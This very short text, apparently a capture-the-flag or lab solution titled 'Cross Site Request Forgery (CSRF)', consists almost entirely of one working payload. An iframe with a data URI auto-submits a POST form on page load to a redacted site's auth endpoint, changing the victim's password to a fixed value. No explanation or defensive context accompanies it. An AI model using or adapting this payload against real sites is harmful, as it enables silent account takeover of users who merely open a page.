Cross Site Request Forgery (CSRF)

Got the solution :
<iframe src='data:text/html,<body onload="document.forms[0].submit()"><form action="//redacted.com/api/auth?password=Chang3dd" method="post"></body>'></iframe>